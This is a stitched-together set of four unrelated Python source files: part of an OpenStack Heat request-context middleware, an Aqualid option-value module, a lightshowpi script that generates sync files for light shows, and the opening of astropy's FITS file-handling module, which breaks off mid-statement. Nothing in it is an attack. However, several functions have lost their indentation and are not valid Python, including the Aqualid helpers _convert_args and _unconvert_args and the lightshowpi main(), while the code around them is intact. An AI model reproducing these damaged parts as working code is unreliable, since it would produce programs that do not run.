        """Auth plugin for this context, created on first access."""
        if not self._auth_plugin:
            if self.trust_id:
                self._auth_plugin = self.trusts_auth_plugin
            else:
                self._auth_plugin = self._create_auth_plugin()
        return self._auth_plugin
def get_admin_context(show_deleted=False):
    """Return a fresh admin context.

    :param show_deleted: whether soft-deleted records are visible.
    """
    admin_ctx = RequestContext(is_admin=True,
                               show_deleted=show_deleted)
    return admin_ctx
class ContextMiddleware(wsgi.Middleware):
    """WSGI middleware that attaches a RequestContext to each request."""

    def __init__(self, app, conf, **local_conf):
        """Pick the context class and wrap *app*.

        Deployers may substitute their own context class through the
        'context_class' paste option.
        """
        if 'context_class' in local_conf:
            self.ctxcls = importutils.import_class(local_conf['context_class'])
        else:
            self.ctxcls = RequestContext
        super(ContextMiddleware, self).__init__(app)

    def make_context(self, *args, **kwargs):
        """Create a context with the given arguments."""
        return self.ctxcls(*args, **kwargs)

    def process_request(self, req):
        """Constructs an appropriate context from extracted auth information.

        Extract any authentication information in the request and construct
        an appropriate context from it.
        """
        headers = req.headers
        environ = req.environ
        try:
            username = None
            password = None
            aws_creds = None
            auth_user = headers.get('X-Auth-User')
            if auth_user is not None:
                username = auth_user
                password = headers.get('X-Auth-Key')
            else:
                ec2_creds = headers.get('X-Auth-EC2-Creds')
                if ec2_creds is not None:
                    aws_creds = ec2_creds
            roles = headers.get('X-Roles')
            if roles is not None:
                roles = roles.split(',')
            ctx_kwargs = {
                'auth_token': headers.get('X-Auth-Token'),
                'tenant': headers.get('X-Project-Name'),
                'tenant_id': headers.get('X-Project-Id'),
                'aws_creds': aws_creds,
                'username': username,
                'user_id': headers.get('X-User-Id'),
                'password': password,
                'auth_url': headers.get('X-Auth-Url'),
                'roles': roles,
                'request_id': environ.get(oslo_request_id.ENV_REQUEST_ID),
                'auth_token_info': environ.get('keystone.token_info'),
                'region_name': headers.get('X-Region-Name'),
                'auth_plugin': environ.get('keystone.token_auth'),
            }
        except Exception:
            raise exception.NotAuthenticated()
        req.context = self.make_context(**ctx_kwargs)
def ContextMiddleware_filter_factory(global_conf, **local_conf):
    """Factory method for paste.deploy."""
    # Local options take precedence over the global paste configuration.
    conf = dict(global_conf)
    conf.update(local_conf)

    def filter(app):
        return ContextMiddleware(app, conf)

    return filter
def request_context(func):
    """Decorator translating HeatException into an RPC ExpectedException.

    This keeps expected service-level errors from being reported as
    unhandled exceptions by the RPC dispatcher.
    """
    @six.wraps(func)
    def wrapped(self, ctx, *args, **kwargs):
        try:
            result = func(self, ctx, *args, **kwargs)
        except exception.HeatException:
            raise oslo_messaging.rpc.dispatcher.ExpectedException()
        return result
    return wrapped
| |
#
# Copyright (c) 2014-2015 The developers of Aqualid project
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom
# the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
# OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
from aql.util_types import to_sequence, UniqueList, Dict
__all__ = (
'Condition', 'Operation', 'InplaceOperation', 'ConditionalValue',
'OptionValue', 'SimpleOperation', 'SimpleInplaceOperation',
'op_set', 'op_iadd', 'op_isub', 'op_iupdate',
'ErrorOptionValueMergeNonOptionValue'
)
# ==============================================================================
class ErrorOptionValueMergeNonOptionValue(TypeError):
    """Raised when merging an OptionValue with a non-OptionValue object."""

    def __init__(self, value):
        super(ErrorOptionValueMergeNonOptionValue, self).__init__(
            "Unable to merge option value with non option value: '%s'" %
            (type(value),))
# ==============================================================================
class ErrorOptionValueOperationFailed(TypeError):
    """Raised when evaluating an option-value operation raises an error."""

    def __init__(self, op, args, kw, err):
        # Positional arguments first, then the keyword dict, joined with
        # a bare comma (matches the historical message format).
        parts = []
        if args:
            parts.append(', '.join(map(str, args)))
        if kw:
            parts.append(str(kw))
        args_str = ",".join(parts)
        msg = "Operation %s( %s ) failed with error: %s" % (op, args_str, err)
        super(ErrorOptionValueOperationFailed, self).__init__(msg)
# ==============================================================================
def _set_operator(dest_value, value):
    """Replace the destination value entirely with *value*."""
    return value
def _op_iadd_key_operator(dest_value, key, value):
dest_value[key] += value
return dest_value
def _op_isub_key_operator(dest_value, key, value):
dest_value[key] -= value
return dest_value
# ==============================================================================
def _update_operator(dest_value, value):
    """Merge *value* into *dest_value*.

    Lists are extended in place and dicts are updated in place; any
    other destination is simply replaced by *value*.
    """
    if isinstance(dest_value, (UniqueList, list)):
        dest_value += value
        return dest_value
    if isinstance(dest_value, Dict):
        dest_value.update(value)
        return dest_value
    return value
# ==============================================================================
def op_set(value):
    """Create an operation that replaces an option's value with *value*."""
    return SimpleInplaceOperation(_set_operator, value)
def op_set_key(key, value):
    """Create an operation that sets item *key* of an option's value."""
    return SimpleInplaceOperation(operator.setitem, key, value)
def op_get_key(value, key):
    """Create an operation that reads item *key* from *value*."""
    return SimpleOperation(operator.getitem, value, key)
def op_iadd(value):
    """Create an operation that in-place adds *value* to an option's value."""
    return SimpleInplaceOperation(operator.iadd, value)
def op_iadd_key(key, value):
    """Create an operation that in-place adds *value* to item *key*."""
    return SimpleInplaceOperation(_op_iadd_key_operator, key, value)
def op_isub_key(key, value):
    """Create an operation that in-place subtracts *value* from item *key*."""
    return SimpleInplaceOperation(_op_isub_key_operator, key, value)
def op_isub(value):
    """Create an operation that in-place subtracts *value* from an option's value."""
    return SimpleInplaceOperation(operator.isub, value)
def op_iupdate(value):
    """Create an operation that merges *value* into an option's value."""
    return SimpleInplaceOperation(_update_operator, value)
# ==============================================================================
def _convert_args(args, kw, options, converter):
tmp_args = []
for arg in args:
if isinstance(arg, Operation):
arg.convert(options, converter)
else:
arg = converter(options, arg)
tmp_args.append(arg)
tmp_kw = {}
for key, arg in kw.items():
if isinstance(arg, Operation):
arg.convert(options, converter)
elif converter is not None:
arg = converter(options, arg)
tmp_kw[key] = arg
return tmp_args, tmp_kw
# ==============================================================================
def _unconvert_args(args, kw, options, context, unconverter):
tmp_args = []
for arg in args:
if isinstance(arg, Operation):
arg = arg(options, context, unconverter)
elif unconverter is not None:
arg = unconverter(options, context, arg)
tmp_args.append(arg)
tmp_kw = {}
for key, arg in kw.items():
if isinstance(arg, Operation):
arg = arg(options, context, unconverter)
elif unconverter is not None:
arg = unconverter(options, context, arg)
tmp_kw[key] = arg
return tmp_args, tmp_kw
# ==============================================================================
class Condition(object):
    """A lazily evaluated predicate guarding a conditional option value.

    Conditions chain: evaluation first checks the parent ``condition``
    (when present) and only then calls ``predicate`` with the
    unconverted arguments.
    """

    __slots__ = (
        'condition',
        'predicate',
        'args',
        'kw',
    )

    def __init__(self, condition, predicate, *args, **kw):
        self.condition = condition
        self.predicate = predicate
        self.args = args
        self.kw = kw

    # -----------------------------------------------------------

    def convert(self, options, converter):
        """Convert stored arguments (and the parent condition) in place."""
        self.args, self.kw = _convert_args(
            self.args, self.kw, options, converter)
        if self.condition is not None:
            self.condition.convert(options, converter)

    # -----------------------------------------------------------

    def __call__(self, options, context, unconverter):
        """Evaluate the condition chain; return the predicate's verdict."""
        parent = self.condition
        if (parent is not None) and not parent(options, context, unconverter):
            return False
        args, kw = _unconvert_args(
            self.args, self.kw, options, context, unconverter)
        return self.predicate(options, context, *args, **kw)
# ==============================================================================
class Operation(object):
    """A deferred call bound to option evaluation.

    Stores an action plus its arguments; ``__call__`` unconverts the
    arguments and invokes the action, wrapping any failure in
    ErrorOptionValueOperationFailed.
    """

    __slots__ = (
        'action',
        'kw',
        'args',
    )

    def __init__(self, action, *args, **kw):
        self.action = action
        self.args = args
        self.kw = kw

    # -----------------------------------------------------------

    def convert(self, options, converter):
        """Convert stored arguments in place using *converter*."""
        self.args, self.kw = _convert_args(
            self.args, self.kw, options, converter)

    # -----------------------------------------------------------

    def _call_action(self, options, context, args, kw):
        # Subclasses override this to change how the action is invoked.
        return self.action(options, context, *args, **kw)

    # -----------------------------------------------------------

    def __call__(self, options, context, unconverter):
        """Unconvert the stored arguments and run the action."""
        args, kw = _unconvert_args(
            self.args, self.kw, options, context, unconverter)
        try:
            return self._call_action(options, context, args, kw)
        except Exception as ex:
            raise ErrorOptionValueOperationFailed(self.action, args, kw, ex)

    # Arithmetic combinators build new deferred operations.

    def __add__(self, other):
        return SimpleOperation(operator.add, self, other)

    def __radd__(self, other):
        return SimpleOperation(operator.add, other, self)

    def __sub__(self, other):
        return SimpleOperation(operator.sub, self, other)

    def __rsub__(self, other):
        return SimpleOperation(operator.sub, other, self)
# ==============================================================================
class SimpleOperation(Operation):
    """Operation whose action receives only the stored arguments.

    Unlike the base class, the action is not passed options/context.
    """
    def _call_action(self, options, context, args, kw):
        return self.action(*args, **kw)
# ==============================================================================
class InplaceOperation(object):
    """A deferred in-place modification of an option's current value."""
    __slots__ = (
        'action',
        'kw',
        'args',
    )
    def __init__(self, action, *args, **kw):
        self.action = action
        self.args = args
        self.kw = kw
    def convert(self, options, converter):
        """Convert stored arguments in place using *converter*."""
        self.args, self.kw = _convert_args(
            self.args, self.kw, options, converter)
    def _call_action(self, options, context, dest_value, args, kw):
        # Subclasses override this to change how the action is invoked.
        return self.action(options, context, dest_value, *args, **kw)
    def __call__(self, options, context, dest_value, value_type, unconverter):
        """Apply the action to *dest_value* and coerce the result.

        A None action leaves the value untouched.  A None result from
        the action means the value was modified in place, so
        *dest_value* itself is reused.  The final result is normalised
        through *value_type* before being returned.
        """
        if self.action is None:
            return dest_value
        args, kw = _unconvert_args(
            self.args, self.kw, options, context, unconverter)
        try:
            result = self._call_action(options, context, dest_value, args, kw)
        except Exception as ex:
            raise ErrorOptionValueOperationFailed(self.action, args, kw, ex)
        if result is None:
            result = dest_value
        dest_value = value_type(result)
        return dest_value
# ==============================================================================
class SimpleInplaceOperation(InplaceOperation):
    """InplaceOperation whose action receives only the value and arguments.

    Unlike the base class, the action is not passed options/context.
    """
    def _call_action(self, options, context, dest_value, args, kw):
        return self.action(dest_value, *args, **kw)
# ==============================================================================
class ConditionalValue (object):
    """Pairs an in-place operation with an optional guarding condition."""

    __slots__ = (
        'ioperation',
        'condition',
    )

    def __init__(self, ioperation, condition=None):
        self.ioperation = ioperation
        self.condition = condition

    # -----------------------------------------------------------

    def convert(self, options, converter):
        """Convert the condition and the operation arguments in place."""
        if isinstance(self.condition, Condition):
            self.condition.convert(options, converter)
        if isinstance(self.ioperation, InplaceOperation):
            self.ioperation.convert(options, converter)

    # -----------------------------------------------------------

    def evaluate(self, value, value_type, options, context, unconverter):
        """Return the (possibly updated) value.

        The operation is applied only when there is no condition or the
        condition evaluates to true.
        """
        cond = self.condition
        applies = (cond is None) or cond(options, context, unconverter)
        if applies and (self.ioperation is not None):
            value = self.ioperation(
                options, context, value, value_type, unconverter)
        return value
# ==============================================================================
class OptionValue (object):
    """The stored state of a single option: its type plus the ordered list
    of conditional modifications that produce the final value on demand."""
    __slots__ = (
        'option_type',
        'conditional_values',
    )
    def __init__(self, option_type, conditional_values=None):
        self.option_type = option_type
        self.conditional_values = list(to_sequence(conditional_values))
    # -----------------------------------------------------------
    def is_set(self):
        """Return True if any conditional value has been recorded."""
        return bool(self.conditional_values)
    # -----------------------------------------------------------
    def is_tool_key(self):
        """Return True if the underlying option type is a tool key."""
        return self.option_type.is_tool_key
    # -----------------------------------------------------------
    def append_value(self, conditional_value):
        """Add a conditional value to be applied last."""
        self.conditional_values.append(conditional_value)
    # -----------------------------------------------------------
    def prepend_value(self, conditional_value):
        """Insert a conditional value to be applied first."""
        self.conditional_values[:0] = [conditional_value]
    # -----------------------------------------------------------
    def merge(self, other):
        """Merge another OptionValue's conditional values into this one.

        The common leading run of identical value objects is kept once;
        only the differing tail of *other* is appended.  An auto option
        type is upgraded to the other's non-auto type.
        """
        if self is other:
            return
        if not isinstance(other, OptionValue):
            raise ErrorOptionValueMergeNonOptionValue(other)
        values = self.conditional_values
        other_values = other.conditional_values
        # Length of the shared leading run (compared by identity).
        diff_index = 0
        for value1, value2 in zip(values, other_values):
            if value1 is not value2:
                break
            diff_index += 1
        if self.option_type.is_auto and not other.option_type.is_auto:
            self.option_type = other.option_type
        self.conditional_values += other_values[diff_index:]
    # -----------------------------------------------------------
    def reset(self):
        """Drop all recorded conditional values."""
        self.conditional_values = []
    # -----------------------------------------------------------
    def copy(self):
        """Return a copy (the conditional values list is copied by __init__)."""
        return OptionValue(self.option_type, self.conditional_values)
    # -----------------------------------------------------------
    def __copy__(self):
        return self.copy()
    # -----------------------------------------------------------
    def get(self, options, context, evaluator=None):
        """Evaluate and return the option's current value.

        *context* caches results per OptionValue.  The partial value is
        stored in the context before and during the loop — presumably so
        that re-entrant/self-referencing evaluations see the value
        computed so far (TODO confirm against callers).
        """
        if context is None:
            context = {}
        else:
            try:
                return context[self]
            except KeyError:
                pass
        value_type = self.option_type
        value = value_type()
        context[self] = value
        for conditional_value in self.conditional_values:
            value = conditional_value.evaluate(
                value, value_type, options, context, evaluator)
            context[self] = value
        return value
| |
# sync file generator for lightshowpi
# run usage
#
# python sync_file_generator.py
#
# Enter y to confirm that you wish to run this
# Enter the path to the folder containing your audio files
# along with the sync files it will also generate a playlist file
# enter the path to this playlist file in your overrides.cfg and
# lightshowpi will use this as your new playlist
import decoder
import glob
import mutagen
import numpy as np
import os
import sys
import wave
HOME_DIR = os.getenv("SYNCHRONIZED_LIGHTS_HOME")
if not HOME_DIR:
    print("Need to setup SYNCHRONIZED_LIGHTS_HOME environment variable, "
          "see readme")
    sys.exit()
# hack to get the configuration_manager and fft modules to load
# from a different directory
path = list(sys.path)  # keep a copy so main() can restore sys.path afterwards
# insert script location and configuration_manager location into path
sys.path.insert(0, HOME_DIR + "/py")
# import the configuration_manager and fft now that we can
import fft
import hardware_controller as hc
# get copy of configuration manager
cm = hc.cm
#### reusing code from synchronized_lights.py
#### no need to reinvent the wheel
GPIOLEN = cm.hardware.gpio_len
_MIN_FREQUENCY = cm.audio_processing.min_frequency
_MAX_FREQUENCY = cm.audio_processing.max_frequency
# Optional settings: fall back to 0 (disabled) when not configured.
# Narrowed from bare 'except:' so SystemExit/KeyboardInterrupt are not
# swallowed here.
try:
    _CUSTOM_CHANNEL_MAPPING = cm.audio_processing.custom_channel_mapping
except Exception:
    _CUSTOM_CHANNEL_MAPPING = 0
try:
    _CUSTOM_CHANNEL_FREQUENCIES = cm.audio_processing.custom_channel_frequencies
except Exception:
    _CUSTOM_CHANNEL_FREQUENCIES = 0
CHUNK_SIZE = 2048  # Use a multiple of 8 (move this to config)
def calculate_channel_frequency(min_frequency,
                                max_frequency,
                                custom_channel_mapping,
                                custom_channel_frequencies):
    """
    Calculate frequency values

    Calculate the (low, high) frequency band for each channel, taking
    custom channel mappings and custom frequency limits into account.

    :param min_frequency: lowest frequency of interest
    :param max_frequency: highest frequency of interest
    :param custom_channel_mapping: 1-based list mapping GPIO channels to
        logical channels, or 0 when unused
    :param custom_channel_frequencies: explicit list of band limits, or 0
    :return: list of (low, high) frequency tuples, one per channel
    """
    # How many channels do we need to calculate the frequency for
    if custom_channel_mapping != 0 and len(custom_channel_mapping) == GPIOLEN:
        channel_length = max(custom_channel_mapping)
    else:
        channel_length = GPIOLEN
    # Spread the octave range logarithmically across the channels.
    octaves = (np.log(max_frequency / min_frequency)) / np.log(2)
    octaves_per_channel = octaves / channel_length
    frequency_limits = []
    frequency_store = []
    frequency_limits.append(min_frequency)
    if custom_channel_frequencies != 0 and (len(custom_channel_frequencies)
                                            >= channel_length + 1):
        # Caller supplied explicit band limits; use them as-is.
        frequency_limits = custom_channel_frequencies
    else:
        for i in range(1, GPIOLEN + 1):
            frequency_limits.append(frequency_limits[-1]
                                    * 10 ** (3 /
                                             (10 * (1 / octaves_per_channel))))
    for i in range(0, channel_length):
        frequency_store.append((frequency_limits[i], frequency_limits[i + 1]))
    # we have the frequencies now lets map them if custom mapping is defined
    if custom_channel_mapping != 0 and len(custom_channel_mapping) == GPIOLEN:
        # Re-order the bands according to the 1-based custom mapping.
        # (Unused locals mapped_frequency_set_low/high removed.)
        frequency_map = []
        for i in range(0, GPIOLEN):
            mapped_channel = custom_channel_mapping[i] - 1
            frequency_map.append(frequency_store[mapped_channel])
        return frequency_map
    else:
        return frequency_store
def cache_song(song_filename):
    """Play the next song from the play list (or --file argument).

    Computes per-chunk FFT levels for *song_filename* and writes them,
    prefixed with the per-channel std-dev and mean rows, to a hidden
    ".<name>.sync" file next to the song.
    """
    # Initialize FFT stats
    matrix = [0 for _ in range(GPIOLEN)] # get length of gpio and assign it to a variable
    # Set up audio
    if song_filename.endswith('.wav'):
        musicfile = wave.open(song_filename, 'r')
    else:
        musicfile = decoder.open(song_filename)
    sample_rate = musicfile.getframerate()
    num_channels = musicfile.getnchannels()
    fft_calc = fft.FFT(CHUNK_SIZE,
                       sample_rate,
                       GPIOLEN,
                       _MIN_FREQUENCY,
                       _MAX_FREQUENCY,
                       _CUSTOM_CHANNEL_MAPPING,
                       _CUSTOM_CHANNEL_FREQUENCIES)
    song_filename = os.path.abspath(song_filename)
    # create empty array for the cache_matrix
    cache_matrix = np.empty(shape=[0, GPIOLEN])
    cache_filename = \
        os.path.dirname(song_filename) + "/." + os.path.basename(song_filename) + ".sync"
    # The values 12 and 1.5 are good estimates for first time playing back
    # (i.e. before we have the actual mean and standard deviations
    # calculated for each channel).
    mean = [12.0 for _ in range(GPIOLEN)]
    std = [1.5 for _ in range(GPIOLEN)]
    # Process audio song_filename
    row = 0
    data = musicfile.readframes(CHUNK_SIZE) # move chunk_size to configuration_manager
    # NOTE(review): comparing against '' assumes Python 2 string frames;
    # under Python 3, readframes returns bytes and this loop never runs.
    while data != '':
        # No cache - Compute FFT in this chunk, and cache results
        matrix = fft_calc.calculate_levels(data)
        # Add the matrix to the end of the cache
        cache_matrix = np.vstack([cache_matrix, matrix])
        # Read next chunk of data from music song_filename
        data = musicfile.readframes(CHUNK_SIZE)
        row = row + 1
    # Compute the standard deviation and mean values for the cache,
    # ignoring silent (zero-level) entries.
    for i in range(0, GPIOLEN):
        std[i] = np.std([item for item in cache_matrix[:, i] if item > 0])
        mean[i] = np.mean([item for item in cache_matrix[:, i] if item > 0])
    # Add mean and std to the top of the cache
    cache_matrix = np.vstack([mean, cache_matrix])
    cache_matrix = np.vstack([std, cache_matrix])
    # Save the cache using numpy savetxt
    np.savetxt(cache_filename, cache_matrix)
#### end reuse
def main():
print "Do you want to generating sync files"
print
print "This could take a while if you have a lot of songs"
question = raw_input("Would you like to proceed? (Y to continue) :")
if not question in ["y", "Y"]:
sys.exit(0)
location = raw_input("Enter the path to the folder of songs:")
location += "/"
sync_list = list()
audio_file_types = ["*.mp3", "*.mp4",
"*.m4a", "*.m4b",
"*.aac", "*.ogg",
"*.flac", "*.oga",
"*.wma", "*.wav"]
for file_type in audio_file_types:
sync_list.extend(glob.glob(location + file_type))
playlistFile = open(location + "playlist", "w")
for song in sync_list:
print "Generating sync file for",song
cache_song(song)
print "cached"
metadata = mutagen.File(song, easy=True)
if "title" in metadata:
title = metadata["title"][0]
else:
title = os.path.splitext(os.path.basename(song))[0].strip()
title = title.replace("_", " ")
title = title.replace("-", " - ")
playlistFile.write(title + "\t" + song + "\n")
playlistFile.close()
print "All Finished."
print "A playlist was also generated"
print location + "playlist"
# Restore the original sys.path (undo the HOME_DIR/py insertion above).
sys.path[:] = path
if __name__ == "__main__":
    main()
| |
# Licensed under a 3-clause BSD style license - see PYFITS.rst
import bz2
import gzip
import errno
import http.client
import mmap
import operator
import pathlib
import io
import os
import sys
import tempfile
import warnings
import zipfile
import re
from functools import reduce
import numpy as np
from .util import (isreadable, iswritable, isfile, fileobj_open, fileobj_name,
fileobj_closed, fileobj_mode, _array_from_file,
_array_to_file, _write_string)
from astropy.utils.data import download_file, _is_url
from astropy.utils.decorators import classproperty, deprecated_renamed_argument
from astropy.utils.exceptions import AstropyUserWarning
# Maps astropy.io.fits-specific file mode names to the appropriate file
# modes to use for the underlying raw files
IO_FITS_MODES = {
    'readonly': 'rb',
    'copyonwrite': 'rb',
    'update': 'rb+',
    'append': 'ab+',
    'ostream': 'wb',
    'denywrite': 'rb'}
# Maps OS-level file modes to the appropriate astropy.io.fits specific mode
# to use when given file objects but no mode specified; obviously in
# IO_FITS_MODES there are overlaps; for example 'readonly' and 'denywrite'
# both require the file to be opened in 'rb' mode. But 'readonly' is the
# default behavior for such files if not otherwise specified.
# Note: 'ab' is only supported for 'ostream' which is output-only.
FILE_MODES = {
    'rb': 'readonly', 'rb+': 'update',
    'wb': 'ostream', 'wb+': 'update',
    'ab': 'ostream', 'ab+': 'append'}
# A match indicates the file was opened in text mode, which is not allowed
TEXT_RE = re.compile(r'^[rwa]((t?\+?)|(\+?t?))$')
# readonly actually uses copyonwrite for mmap so that readonly without mmap and
# with mmap still have to same behavior with regard to updating the array. To
# get a truly readonly mmap use denywrite
# the name 'denywrite' comes from a deprecated flag to mmap() on Linux--it
# should be clarified that 'denywrite' mode is not directly analogous to the
# use of that flag; it was just taken, for lack of anything better, as a name
# that means something like "read only" but isn't readonly.
MEMMAP_MODES = {'readonly': mmap.ACCESS_COPY,
                'copyonwrite': mmap.ACCESS_COPY,
                'update': mmap.ACCESS_WRITE,
                'append': mmap.ACCESS_COPY,
                'denywrite': mmap.ACCESS_READ}
# TODO: Eventually raise a warning, and maybe even later disable the use of
# 'copyonwrite' and 'denywrite' modes unless memmap=True. For now, however,
# that would generate too many warnings for too many users. If nothing else,
# wait until the new logging system is in place.
# Leading byte signatures used to sniff compressed input files.
GZIP_MAGIC = b'\x1f\x8b\x08'
PKZIP_MAGIC = b'\x50\x4b\x03\x04'
BZIP2_MAGIC = b'\x42\x5a'
def _normalize_fits_mode(mode):
    """Translate an OS-level file mode (e.g. 'rb+') to the matching
    astropy.io.fits mode name (e.g. 'update').

    A value that is ``None`` or already a FITS mode name passes through
    unchanged.  Text modes are rejected outright, as are modes with no
    FITS equivalent.
    """
    # Already normalized (or absent) -- nothing to do.
    if mode is None or mode in IO_FITS_MODES:
        return mode

    if TEXT_RE.match(mode):
        raise ValueError(
            "Text mode '{}' not supported: "
            "files must be opened in binary mode".format(mode))

    translated = FILE_MODES.get(mode)
    if translated not in IO_FITS_MODES:
        raise ValueError(f"Mode '{mode}' not recognized")
    return translated
class _File:
    """
    Represents a FITS file on disk (or in some other file-like object).

    Wraps the raw underlying file object (possibly gzip/zip/bzip2-compressed,
    a URL, or any file-like object) and normalizes read/write/seek/mmap
    access for the rest of astropy.io.fits.
    """

    @deprecated_renamed_argument('clobber', 'overwrite', '2.0')
    def __init__(self, fileobj=None, mode=None, memmap=None, overwrite=False,
                 cache=True):
        self.strict_memmap = bool(memmap)
        memmap = True if memmap is None else memmap

        if fileobj is None:
            # No backing file at all: "simulate-only" mode.
            self._file = None
            self.closed = False
            self.binary = True
            self.mode = mode
            self.memmap = memmap
            self.compression = None
            self.readonly = False
            self.writeonly = False
            self.simulateonly = True
            self.close_on_error = False
            return
        else:
            self.simulateonly = False
            # If fileobj is of type pathlib.Path
            if isinstance(fileobj, pathlib.Path):
                fileobj = str(fileobj)
            elif isinstance(fileobj, bytes):
                # Using bytes as filename is tricky, it's deprecated for Windows
                # in Python 3.5 (because it could lead to false-positives) but
                # was fixed and un-deprecated in Python 3.6.
                # However it requires that the bytes object is encoded with the
                # file system encoding.
                # Probably better to error out and ask for a str object instead.
                # TODO: This could be revised when Python 3.5 support is dropped
                # See also: https://github.com/astropy/astropy/issues/6789
                raise TypeError("names should be `str` not `bytes`.")

        # Holds mmap instance for files that use mmap
        self._mmap = None

        if mode is not None and mode not in IO_FITS_MODES:
            raise ValueError(f"Mode '{mode}' not recognized")

        if isfile(fileobj):
            # An already-open real file: its OS mode must agree with any
            # explicitly requested FITS mode.
            objmode = _normalize_fits_mode(fileobj_mode(fileobj))
            if mode is not None and mode != objmode:
                raise ValueError(
                    "Requested FITS mode '{}' not compatible with open file "
                    "handle mode '{}'".format(mode, objmode))
            mode = objmode
        if mode is None:
            mode = 'readonly'

        # Handle raw URLs
        if (isinstance(fileobj, str) and
                mode not in ('ostream', 'append', 'update') and
                _is_url(fileobj)):
            self.name = download_file(fileobj, cache=cache)
        # Handle responses from URL requests that have already been opened
        elif isinstance(fileobj, http.client.HTTPResponse):
            if mode in ('ostream', 'append', 'update'):
                raise ValueError(
                    f"Mode {mode} not supported for HTTPResponse")
            # NOTE(review): this branch never sets self.name, so attribute
            # access to .name later on would fail for HTTPResponse input --
            # confirm against upstream astropy before relying on it.
            fileobj = io.BytesIO(fileobj.read())
        else:
            self.name = fileobj_name(fileobj)

        self.closed = False
        self.binary = True
        self.mode = mode
        self.memmap = memmap

        # Underlying fileobj is a file-like object, but an actual file object
        self.file_like = False

        # Should the object be closed on error: see
        # https://github.com/astropy/astropy/issues/6168
        self.close_on_error = False

        # More defaults to be adjusted below as necessary
        self.compression = None
        self.readonly = False
        self.writeonly = False

        # Initialize the internal self._file object
        if isfile(fileobj):
            self._open_fileobj(fileobj, mode, overwrite)
        elif isinstance(fileobj, str):
            self._open_filename(fileobj, mode, overwrite)
        else:
            self._open_filelike(fileobj, mode, overwrite)

        self.fileobj_mode = fileobj_mode(self._file)

        if isinstance(fileobj, gzip.GzipFile):
            self.compression = 'gzip'
        elif isinstance(fileobj, zipfile.ZipFile):
            # Reading from zip files is supported but not writing (yet)
            self.compression = 'zip'
        elif isinstance(fileobj, bz2.BZ2File):
            self.compression = 'bzip2'

        if (mode in ('readonly', 'copyonwrite', 'denywrite') or
                (self.compression and mode == 'update')):
            self.readonly = True
        elif (mode == 'ostream' or
                (self.compression and mode == 'append')):
            self.writeonly = True

        # For 'ab+' mode, the pointer is at the end after the open in
        # Linux, but is at the beginning in Solaris.
        if (mode == 'ostream' or self.compression or
                not hasattr(self._file, 'seek')):
            # For output stream start with a truncated file.
            # For compressed files we can't really guess at the size
            self.size = 0
        else:
            # Measure the size without disturbing the current position.
            pos = self._file.tell()
            self._file.seek(0, 2)
            self.size = self._file.tell()
            self._file.seek(pos)

        if self.memmap:
            if not isfile(self._file):
                # mmap needs a real OS-level file descriptor.
                self.memmap = False
            elif not self.readonly and not self._mmap_available:
                # Test mmap.flush--see
                # https://github.com/astropy/astropy/issues/968
                self.memmap = False

    def __repr__(self):
        return '<{}.{} {}>'.format(self.__module__, self.__class__.__name__,
                                   self._file)

    # Support the 'with' statement
    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.close()

    def readable(self):
        """Return True if the underlying file can be read from."""
        if self.writeonly:
            return False
        return isreadable(self._file)

    def read(self, size=None):
        """Read up to ``size`` bytes (all remaining bytes if ``size`` is None)."""
        if not hasattr(self._file, 'read'):
            raise EOFError
        try:
            return self._file.read(size)
        except OSError:
            # On some versions of Python, it appears, GzipFile will raise an
            # OSError if you try to read past its end (as opposed to just
            # returning '')
            # NOTE(review): this returns a str, not bytes, from a binary
            # read -- kept as-is for compatibility; confirm against upstream.
            if self.compression == 'gzip':
                return ''
            raise

    def readarray(self, size=None, offset=0, dtype=np.uint8, shape=None):
        """
        Similar to file.read(), but returns the contents of the underlying
        file as a numpy array (or mmap'd array if memmap=True) rather than a
        string.

        Usually it's best not to use the `size` argument with this method, but
        it's provided for compatibility.
        """
        if not hasattr(self._file, 'read'):
            raise EOFError

        if not isinstance(dtype, np.dtype):
            dtype = np.dtype(dtype)

        if size and size % dtype.itemsize != 0:
            raise ValueError(f'size {size} not a multiple of {dtype}')

        if isinstance(shape, int):
            shape = (shape,)

        if not (size or shape):
            warnings.warn('No size or shape given to readarray(); assuming a '
                          'shape of (1,)', AstropyUserWarning)
            shape = (1,)

        if size and not shape:
            shape = (size // dtype.itemsize,)

        if size and shape:
            # When both are given they must describe the same number of bytes.
            actualsize = np.prod(shape) * dtype.itemsize

            if actualsize > size:
                raise ValueError('size {} is too few bytes for a {} array of '
                                 '{}'.format(size, shape, dtype))
            elif actualsize < size:
                raise ValueError('size {} is too many bytes for a {} array of '
                                 '{}'.format(size, shape, dtype))

        filepos = self._file.tell()

        try:
            if self.memmap:
                if self._mmap is None:
                    # Instantiate Memmap array of the file offset at 0 (so we
                    # can return slices of it to offset anywhere else into the
                    # file)
                    access_mode = MEMMAP_MODES[self.mode]

                    # For reasons unknown the file needs to point to (near)
                    # the beginning or end of the file. No idea how close to
                    # the beginning or end.
                    # If I had to guess there is some bug in the mmap module
                    # of CPython or perhaps in microsoft's underlying code
                    # for generating the mmap.
                    self._file.seek(0, 0)
                    # This would also work:
                    # self._file.seek(0, 2)  # moves to the end

                    try:
                        self._mmap = mmap.mmap(self._file.fileno(), 0,
                                               access=access_mode,
                                               offset=0)
                    except OSError as exc:
                        # NOTE: mode='readonly' results in the memory-mapping
                        # using the ACCESS_COPY mode in mmap so that users can
                        # modify arrays. However, on some systems, the OS raises
                        # a '[Errno 12] Cannot allocate memory' OSError if the
                        # address space is smaller than the file. The solution
                        # is to open the file in mode='denywrite', which at
                        # least allows the file to be opened even if the
                        # resulting arrays will be truly read-only.
                        if exc.errno == errno.ENOMEM and self.mode == 'readonly':
